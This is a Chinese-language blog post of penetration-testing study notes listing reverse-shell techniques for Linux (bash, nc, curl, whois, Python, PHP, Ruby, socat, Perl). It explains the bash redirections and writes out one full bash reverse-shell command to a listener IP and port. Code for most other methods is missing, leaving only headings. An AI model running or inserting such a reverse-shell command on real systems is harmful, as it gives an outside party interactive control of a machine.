type
status
date
slug
tags
summary
category
icon
password
📔
学学渗透,补补基础

一、linux下反弹shell

1 bash 反弹

0>&1表示重定向输出,将标准输入(STDIN)输出到标准输出(STDOUT)
>& /dev/tcp/192.168.2.102/7777:重定向输出。>& 将标准输出(STDOUT)和标准错误输出(STDERR)都重定向到指定位置。
bash -i指定bash在交互模式下运行,即这里可以与远程vps交互
可以通过base64反弹:
接收:

2 nc反弹

在远程连接一个本地shell

3 curl反弹

注:bash.html里面写的是bash -i >& /dev/tcp/192.168.2.102/7777 0>&1

4 whois 反弹

反弹的shell后面只能执行后面带的命令

5 python反弹

6 PHP反弹

7 ruby反弹

8 socat反弹

9 Perl反弹

二、windows下反弹shell

看了一下,应用场景对比c2 WebDelivery几乎没有任何优势,先不整理了...
相关文章
web自动化脚本(题目)
Lazy loaded image
php反序列化
Lazy loaded image
flask ssti
Lazy loaded image
域基础理论学习
Lazy loaded image
渗透提权总结
Lazy loaded image
web-shell总结
Lazy loaded image
域基础理论学习渗透提权总结
Loading...
moyaoxue
moyaoxue
moyaoxue
目录
0%